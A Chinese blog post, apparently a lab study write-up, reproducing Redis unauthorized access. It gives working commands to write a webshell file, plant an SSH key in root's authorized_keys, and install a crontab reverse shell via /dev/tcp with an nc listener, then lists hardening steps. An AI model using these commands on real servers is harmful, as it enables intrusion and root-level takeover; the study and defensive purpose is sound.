Redis未授权访问漏洞复现学习

Stella981
• 阅读 811

0x00 前言

前段时间看到想复现学习一下,然后就忘了 越临近考试越不想复习 Redis未授权访问漏洞复现学习

常见的未授权访问漏洞

Redis 未授权访问漏洞 MongoDB 未授权访问漏洞 Jenkins 未授权访问漏洞 Memcached 未授权访问漏洞 JBOSS未授权访问漏洞 VNC 未授权访问漏洞 Docker 未授权访问漏洞 ZooKeeper 未授权访问漏洞 Rsync 未授权访问漏洞 Atlassian Crowd 未授权访问漏洞 CouchDB 未授权访问漏洞 Elasticsearch 未授权访问漏洞 Hadoop未授权访问漏洞 Jupyter Notebook 未授权访问漏洞

今天先学下redis未授权访问

0x01 redis未授权访问漏洞简介

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。

0x02 环境搭建

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

Redis未授权访问漏洞复现学习

tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译

Redis未授权访问漏洞复现学习

cd src/ #进入src目录 cp redis-server /usr/bin/ cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了) cd .. # 返回上一级目录 cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下 redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务

Redis未授权访问漏洞复现学习 服务启动成功!

0x03 漏洞证明

redis-cli -h 靶机IP

Redis未授权访问漏洞复现学习 说明没有设置密码认证,存在Redis未授权漏洞

0x04 漏洞利用

Ubuntu:受害主机 192.168.246.130,A Ubuntu2:攻击主机 192.168.246.131,B 都开启redist服务

redis-server /etc/redis.conf

Redis未授权访问漏洞复现学习

一、利用方法一 ——往web物理路径写webshell

1、利用条件 (1)靶机redis未授权,未登录验证 (2)靶机开启web服务,并且知道网站路径,还需要具有文件读写增删改查权限 2.利用过程

config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save

Redis未授权访问漏洞复现学习 浏览器查看web页面 Redis未授权访问漏洞复现学习

利用方法二 ——导入SSH公钥(用私钥登录)

1、在受害者主机A创建目录

mkdir /root/.ssh/ #创建ssh公钥存放目录(靶机是作为ssh服务器使用的)

2、在攻击机B中生成ssh公钥和私钥,密码设置为空(回车两次)

Ubuntu2:ssh-keygen -t rsa

Redis未授权访问漏洞复现学习 3、在B中 将生成的公钥保存到hhh.txt 再将hhh.txt写入redis

cd .ssh/ 
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > redistest.txt #将生成的公钥保存到redistest.txt
cat redistest.txt | redis-cli -h 192.168.246.130 -x set redistest #将保存ssh的公钥redistext.txt写入redis

Redis未授权访问漏洞复现学习 4、然后登录服务器查看 redis-cli -h 192.168.246.130

config get dir #得到redis备份路径
config set dir /root/.ssh #redis备份路径为ssh公钥存放目录
config set dbfilename authorized_keys #设置上传公钥的备份文件名字为authorized_keys
save

Redis未授权访问漏洞复现学习 5、在主机B使用root身份进行ssh免密登录主机A

ssh -i id_rsa root@192.168.246.130

注意一定要root身份,不然就gg了 Redis未授权访问漏洞复现学习 Redis未授权访问漏洞复现学习 耶✌~~登陆成功

利用方法三 ——利用计划任务执行命令反弹shell

1、利用条件 在redis以root权限运行时可以写crontab来执行命令反弹shell 2、利用过程 先在自己的服务器上监听一个端口

nc -lvnp 7999

再连接redis,写入反弹shell

redis-cli -h 192.168.246.130
config set dir /var/spool/cron
set x "\n* * * * * bash -i >& /dev/tcp/192.168.246.130/7999 0>&1\n"
config set dbfilename root
save

0x05 防范方法

1、禁止远程使用一些高危命令 2、为Redis添加密码验证 我们可以通过修改redis.conf文件来为Redis添加密码验证

requirepass mypassword

3、禁止外网访问 Redis 我们可以通过修改redis.conf文件来使得Redis服务只在当前主机可用

bind 127.0.0.1

4、修改默认端口 5、保证authorized_keys文件的安全

0x06 参考

https://www.cnblogs.com/ECJTUACM-873284962/p/9561993.html https://xz.aliyun.com/t/6103#toc-6

点赞
收藏
评论区
推荐文章
blmius blmius
3年前
MySQL:[Err] 1292 - Incorrect datetime value: ‘0000-00-00 00:00:00‘ for column ‘CREATE_TIME‘ at row 1
文章目录问题用navicat导入数据时,报错:原因这是因为当前的MySQL不支持datetime为0的情况。解决修改sql\mode:sql\mode:SQLMode定义了MySQL应支持的SQL语法、数据校验等,这样可以更容易地在不同的环境中使用MySQL。全局s
皕杰报表之UUID
​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为
待兔 待兔
3个月前
手写Java HashMap源码
HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程HashMap的使用教程22
Jacquelyn38 Jacquelyn38
3年前
2020年前端实用代码段,为你的工作保驾护航
有空的时候,自己总结了几个代码段,在开发中也经常使用,谢谢。1、使用解构获取json数据let jsonData  id: 1,status: "OK",data: 'a', 'b';let  id, status, data: number   jsonData;console.log(id, status, number )
Stella981 Stella981
3年前
KVM调整cpu和内存
一.修改kvm虚拟机的配置1、virsheditcentos7找到“memory”和“vcpu”标签,将<namecentos7</name<uuid2220a6d1a36a4fbb8523e078b3dfe795</uuid
Wesley13 Wesley13
3年前
mysql设置时区
mysql设置时区mysql\_query("SETtime\_zone'8:00'")ordie('时区设置失败,请联系管理员!');中国在东8区所以加8方法二:selectcount(user\_id)asdevice,CONVERT\_TZ(FROM\_UNIXTIME(reg\_time),'08:00','0
Wesley13 Wesley13
3年前
00:Java简单了解
浅谈Java之概述Java是SUN(StanfordUniversityNetwork),斯坦福大学网络公司)1995年推出的一门高级编程语言。Java是一种面向Internet的编程语言。随着Java技术在web方面的不断成熟,已经成为Web应用程序的首选开发语言。Java是简单易学,完全面向对象,安全可靠,与平台无关的编程语言。
Stella981 Stella981
3年前
Django中Admin中的一些参数配置
设置在列表中显示的字段,id为django模型默认的主键list_display('id','name','sex','profession','email','qq','phone','status','create_time')设置在列表可编辑字段list_editable
Wesley13 Wesley13
3年前
MySQL部分从库上面因为大量的临时表tmp_table造成慢查询
背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_
Python进阶者 Python进阶者
9个月前
Excel中这日期老是出来00:00:00,怎么用Pandas把这个去除
大家好,我是皮皮。一、前言前几天在Python白银交流群【上海新年人】问了一个Pandas数据筛选的问题。问题如下:这日期老是出来00:00:00,怎么把这个去除。二、实现过程后来【论草莓如何成为冻干莓】给了一个思路和代码如下:pd.toexcel之前把这